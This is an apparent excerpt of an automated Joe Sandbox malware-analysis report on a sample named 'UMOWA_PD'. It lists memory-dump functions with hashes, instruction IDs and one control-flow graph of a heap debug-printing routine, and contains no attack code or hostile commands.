                                                                                    • Opcode Fuzzy Hash: 581efb3c91f2e712f3ef1f0aca97e2d5bdc756f55724d8ebeca5e5c98ea3f16e
                                                                                    • Instruction Fuzzy Hash: 2990022224110C02D55172588514707100697D0A07F51C416A4018518DC626896976F1
                                                                                    Function 33CD2F00 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8149ee813ae37ed1e7587b0cbda5b73307942d5b546a9047f556a65637c33dac
                                                                                    • Instruction ID: 6ebd476dd27f5e9216aba7ab4682921238d67c88621af61d549a0d519a1ae9b4
                                                                                    • Opcode Fuzzy Hash: 8149ee813ae37ed1e7587b0cbda5b73307942d5b546a9047f556a65637c33dac
                                                                                    • Instruction Fuzzy Hash: 9490022221190442D61166684D14B07100557D0707F51C51AA4148518CC92588656561
                                                                                    Function 33CD2F30 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ff3fc6fa2b1fe47ff18e45ac60a7cce1cadf1ff70c339f47a7e25ecac33e2d75
                                                                                    • Instruction ID: 48d2b16742d9e9b5742b07065ea8ad56e766cf2d5d280d01ef7475ab98596235
                                                                                    • Opcode Fuzzy Hash: ff3fc6fa2b1fe47ff18e45ac60a7cce1cadf1ff70c339f47a7e25ecac33e2d75
                                                                                    • Instruction Fuzzy Hash: BC90022220154842D55163584904B0F510557E1607F91C41EA814A518CC92588596761
                                                                                    Function 33CD2EC0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 54c0e322813f0f87558297682e20d840b940def90fecb08b38c0b107f54bf94c
                                                                                    • Instruction ID: e4572baa7bf7cc83e876f0a03c0d9136c6d878a57fb6a974d3d3ba229d88c76a
                                                                                    • Opcode Fuzzy Hash: 54c0e322813f0f87558297682e20d840b940def90fecb08b38c0b107f54bf94c
                                                                                    • Instruction Fuzzy Hash: 9790023220150802D51162584908747100557D0707F51C416A9158519EC675C8957571
                                                                                    Function 33CD2ED0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 09b363aa48fbc27db9eca8b9e870cda6ebaf4c69625d66b0d39039d0f60eaae0
                                                                                    • Instruction ID: f5e6721d7704b8f512866a50916b8520761f7c53b86ddc32adb7b9735b9cf4ca
                                                                                    • Opcode Fuzzy Hash: 09b363aa48fbc27db9eca8b9e870cda6ebaf4c69625d66b0d39039d0f60eaae0
                                                                                    • Instruction Fuzzy Hash: 009002226011044285517268894490650057BE1617751C526A498C514DC569886966A5
                                                                                    Function 33CD2E80 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6aa908c78a0ee4f6fbe3366fbc63217794fe173367eed3fb15cad52cb7a76365
                                                                                    • Instruction ID: acf1bc97213ad96aac042bf423aebbc3c97f8ae5e27fed531568b0e1122b821d
                                                                                    • Opcode Fuzzy Hash: 6aa908c78a0ee4f6fbe3366fbc63217794fe173367eed3fb15cad52cb7a76365
                                                                                    • Instruction Fuzzy Hash: B790026221110442D51562584504706104557E1607F51C417A6148518CC5398C656165
                                                                                    Function 33CD2EB0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fee846e12c1bb9014a7a1e21420c827456769ce3a53ff45ca89f0c61df658a93
                                                                                    • Instruction ID: 31590ad28e26740eb45cb0e10e078c36b0a469dea3af8307c4bad6753a0cc059
                                                                                    • Opcode Fuzzy Hash: fee846e12c1bb9014a7a1e21420c827456769ce3a53ff45ca89f0c61df658a93
                                                                                    • Instruction Fuzzy Hash: D290023220150802D5116258491470B100557D0707F51C416A5158519DC635885575B1
                                                                                    Function 33CD2E50 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8031393d5e518ac59a8d9e0dd2d401e2ae5e3d8092a56bf18c1b70b93b6ad21f
                                                                                    • Instruction ID: 2ca1a4345451ee82bda3e8de2bc9ce844b060fcb4016637273fa7cf5fb20510a
                                                                                    • Opcode Fuzzy Hash: 8031393d5e518ac59a8d9e0dd2d401e2ae5e3d8092a56bf18c1b70b93b6ad21f
                                                                                    • Instruction Fuzzy Hash: 5D90026234110842D51162584514B06100597E1707F51C41AE5058518DC629CC567166
                                                                                    Function 33CD2E00 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: af65d0d9ff2b04667a95c8ff83fadc46d197a987c1ce9fed78070e9afd2579bb
                                                                                    • Instruction ID: e8f32fc0c9e0c75afd1c3a08865356a4262da7fcbb3c4d641927dac699483ffa
                                                                                    • Opcode Fuzzy Hash: af65d0d9ff2b04667a95c8ff83fadc46d197a987c1ce9fed78070e9afd2579bb
                                                                                    • Instruction Fuzzy Hash: B290026220150803D55166584904607100557D0707F51C416A6058519ECA398C557175
                                                                                    Function 33CD2DC0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2f79864082950e80737a288c53adf81794f3a75b5fc052efc87a8316375e5115
                                                                                    • Instruction ID: 3c94cc96f2a5ae4ce841674ac4b6993136131c4369555b435cbdd15d3db75d1f
                                                                                    • Opcode Fuzzy Hash: 2f79864082950e80737a288c53adf81794f3a75b5fc052efc87a8316375e5115
                                                                                    • Instruction Fuzzy Hash: C390027220110802D55172584504746100557D0707F51C416A9058518EC6698DD976A5
                                                                                    Function 33CD2DA0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5968fc6a78cdc6a351530e8f72da69ec4d579997f58a04e76836ba010b985970
                                                                                    • Instruction ID: fb32dfa04f5c7ec818dcee3c687b94f2f34b30b0781de3e513596189124d1d71
                                                                                    • Opcode Fuzzy Hash: 5968fc6a78cdc6a351530e8f72da69ec4d579997f58a04e76836ba010b985970
                                                                                    • Instruction Fuzzy Hash: 3590022260110902D51272584504616100A57D0647F91C427A5018519ECA358996B171
                                                                                    Function 33CD2D50 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f2b182b1e7b1d7df185a2c51e55c250b112460ce96fbe0ca0fc205500e28ac52
                                                                                    • Instruction ID: ed9fd0480735da1a2e0843312a673fc94d0ce60a28163a00f80a0453c3d9dfdc
                                                                                    • Opcode Fuzzy Hash: f2b182b1e7b1d7df185a2c51e55c250b112460ce96fbe0ca0fc205500e28ac52
                                                                                    • Instruction Fuzzy Hash: 4A90022230110802D51362584514606100997D174BF91C417E5418519DC6358957B172
                                                                                    Function 33CD2CD0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f13831ea3b805701c95ab78823805dcf9bd05703c9f847fc667306b909b451a3
                                                                                    • Instruction ID: ed0a805b9e34f1323d8639162d0f4c7b05dcb1561ccb0005e3f0e6d0b7b11490
                                                                                    • Opcode Fuzzy Hash: f13831ea3b805701c95ab78823805dcf9bd05703c9f847fc667306b909b451a3
                                                                                    • Instruction Fuzzy Hash: 3990023224110802D55272584504606100967D0647F91C417A4418518EC6658A5ABAA1
                                                                                    Function 33CD2CF0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6a0ab1e1d3d7f0f164a736d82f73c34d9c0dbc872877349a5bb6da782ff9e5d9
                                                                                    • Instruction ID: d401c1736ed2e41be1d23f137c58f60531beed537e5ccafebcae1355cd287b00
                                                                                    • Opcode Fuzzy Hash: 6a0ab1e1d3d7f0f164a736d82f73c34d9c0dbc872877349a5bb6da782ff9e5d9
                                                                                    • Instruction Fuzzy Hash: A4900222242145529956B2584504507500667E0647791C417A5408914CC536985AE661
                                                                                    Function 33CD3C90 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: df225b12de0fb37a9fa0a1aecfe519433055aaa9d6d4ba9a56dfae7d51f5dd29
                                                                                    • Instruction ID: c92369cf6395daa8932550df1f9d5e106010755a5842d6f3917bef30ca2e370d
                                                                                    • Opcode Fuzzy Hash: df225b12de0fb37a9fa0a1aecfe519433055aaa9d6d4ba9a56dfae7d51f5dd29
                                                                                    • Instruction Fuzzy Hash: 8790023620110802D92162585904646104657D0707F51D816A441851CDC66488A5B161
                                                                                    Function 33CD2C50 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 50ffa9a58656ea78895f7f18876760a3f63a836942cae58c28f9eb4483fd75e9
                                                                                    • Instruction ID: 90223d9a238257d698f2f73176d5f060750f41d628c6625a14dfa2224ee2eb7f
                                                                                    • Opcode Fuzzy Hash: 50ffa9a58656ea78895f7f18876760a3f63a836942cae58c28f9eb4483fd75e9
                                                                                    • Instruction Fuzzy Hash: 9690022230110403D551725855186065005A7E1707F51D416E4408518CD925885A6262
                                                                                    Function 33CD2C10 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9f738accd3c0ca8a43cccb1a7249f24653eab767b1507258da4ed408cd127981
                                                                                    • Instruction ID: c8fde90730163adf2d4e5fb6c49bc03c7496ec56038a38180cee8ef29362c0e4
                                                                                    • Opcode Fuzzy Hash: 9f738accd3c0ca8a43cccb1a7249f24653eab767b1507258da4ed408cd127981
                                                                                    • Instruction Fuzzy Hash: 2390023220110803D51162585608707100557D0607F51D816A441851CDD66688557161
                                                                                    Function 33CD2C20 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 85751d5119bc068239fb0b770546cf74338f6c1bfd6e5c2944b5402b5ebef564
                                                                                    • Instruction ID: 74a3982720b85de63f3735051128e866a80d5b306eedcf479b254a1590207055
                                                                                    • Opcode Fuzzy Hash: 85751d5119bc068239fb0b770546cf74338f6c1bfd6e5c2944b5402b5ebef564
                                                                                    • Instruction Fuzzy Hash: E190022220514842D51166585508A06100557D060BF51D416A5058559DC6358855B171
                                                                                    Function 33CD3C30 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 29b307e22927fafb2f8a62cc0ab31aaf06867c786e6c61397e2457cad647866a
                                                                                    • Instruction ID: c0f315e2cfb97a11283bc4120df1ef6bea0b852efc398cc99419ced70557b2aa
                                                                                    • Opcode Fuzzy Hash: 29b307e22927fafb2f8a62cc0ab31aaf06867c786e6c61397e2457cad647866a
                                                                                    • Instruction Fuzzy Hash: 1390023220210542D95163585904A4E510557E1707B91D81AA4009518CC92488656261
                                                                                    Function 33CD2C30 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c0fa4a3c206fbbe5c5b83adfc335920f86632a47527282697392a41544fcb1c2
                                                                                    • Instruction ID: ff28b9b51433a34939ef6c2f869ac2b1ba8141a769ef6f57d308e491fe71ddc7
                                                                                    • Opcode Fuzzy Hash: c0fa4a3c206fbbe5c5b83adfc335920f86632a47527282697392a41544fcb1c2
                                                                                    • Instruction Fuzzy Hash: C790022A21310402D5917258550860A100557D1607F91D81AA400951CCC925886D6361
                                                                                    Function 33CD2B20 Relevance: .0, Instructions: 1COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c302c58efd76b85a4ce481e756adcff9e2826d97265cee25fad13d595f16b223
                                                                                    • Instruction ID: c3d9aa221953d091c38835bc86f040f9f4a3f11c5d8827b9111ea5b8d25530b9
                                                                                    • Opcode Fuzzy Hash: c302c58efd76b85a4ce481e756adcff9e2826d97265cee25fad13d595f16b223
                                                                                    • Instruction Fuzzy Hash:
                                                                                    Function 33D6A1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 381 33d6a1f0-33d6a269 call 33ca2330 * 2 RtlDebugPrintTimes 387 33d6a41f-33d6a444 call 33ca24d0 * 2 call 33cd4b50 381->387 388 33d6a26f-33d6a27a 381->388 390 33d6a2a4 388->390 391 33d6a27c-33d6a289 388->391 392 33d6a2a8-33d6a2b4 390->392 394 33d6a28f-33d6a295 391->394 395 33d6a28b-33d6a28d 391->395 398 33d6a2c1-33d6a2c3 392->398 396 33d6a373-33d6a375 394->396 397 33d6a29b-33d6a2a2 394->397 395->394 401 33d6a39f-33d6a3a1 396->401 397->392 402 33d6a2b6-33d6a2bc 398->402 403 33d6a2c5-33d6a2c7 398->403 407 33d6a3a7-33d6a3b4 401->407 408 33d6a2d5-33d6a2fd RtlDebugPrintTimes 401->408 405 33d6a2be 402->405 406 33d6a2cc-33d6a2d0 402->406 403->401 405->398 410 33d6a3ec-33d6a3ee 406->410 411 33d6a3b6-33d6a3c3 407->411 412 33d6a3da-33d6a3e6 407->412 408->387 421 33d6a303-33d6a320 RtlDebugPrintTimes 408->421 410->401 415 33d6a3c5-33d6a3c9 411->415 416 33d6a3cb-33d6a3d1 411->416 413 33d6a3fb-33d6a3fd 412->413 419 33d6a3f0-33d6a3f6 413->419 420 33d6a3ff-33d6a401 413->420 415->416 417 33d6a3d7 416->417 418 33d6a4eb-33d6a4ed 416->418 417->412 422 33d6a403-33d6a409 418->422 423 33d6a447-33d6a44b 419->423 424 33d6a3f8 419->424 420->422 421->387 429 33d6a326-33d6a34c RtlDebugPrintTimes 421->429 426 33d6a450-33d6a474 RtlDebugPrintTimes 422->426 427 33d6a40b-33d6a41d RtlDebugPrintTimes 422->427 425 33d6a51f-33d6a521 423->425 424->413 426->387 433 33d6a476-33d6a493 RtlDebugPrintTimes 426->433 427->387 429->387 434 33d6a352-33d6a354 429->434 433->387 441 33d6a495-33d6a4c4 RtlDebugPrintTimes 433->441 435 33d6a356-33d6a363 434->435 436 33d6a377-33d6a38a 434->436 438 33d6a365-33d6a369 435->438 439 33d6a36b-33d6a371 435->439 440 33d6a397-33d6a399 436->440 438->439 439->396 439->436 442 33d6a38c-33d6a392 440->442 443 33d6a39b-33d6a39d 440->443 441->387 447 33d6a4ca-33d6a4cc 441->447 444 33d6a394 442->444 445 33d6a3e8-33d6a3ea 442->445 443->401 444->440 445->410 448 33d6a4f2-33d6a505 447->448 449 33d6a4ce-33d6a4db 447->449 450 33d6a512-33d6a514 448->450 451 33d6a4e3-33d6a4e9 449->451 452 33d6a4dd-33d6a4e1 449->452 453 33d6a516 450->453 454 33d6a507-33d6a50d 450->454 451->418 451->448 452->451 453->420 455 33d6a50f 454->455 456 33d6a51b-33d6a51d 454->456 455->450 456->425
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: HEAP:
                                                                                    • API String ID: 3446177414-2466845122
                                                                                    • Opcode ID: 6aca8eb0e723c110e86f528e06710d83c53f9bee84b1f8d3af136d7eb6e17f23
                                                                                    • Instruction ID: 62affa23aee3747b4944bc09ba78b3f8a3eeab33f186ee065b749b5ccfdb1780
                                                                                    • Opcode Fuzzy Hash: 6aca8eb0e723c110e86f528e06710d83c53f9bee84b1f8d3af136d7eb6e17f23
                                                                                    • Instruction Fuzzy Hash: 4EA1ACB5B143128FD704CE28C894A2AB7E5FF88758F89456DE996DB310EB30EC45CB91
                                                                                    Function 33CC7550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
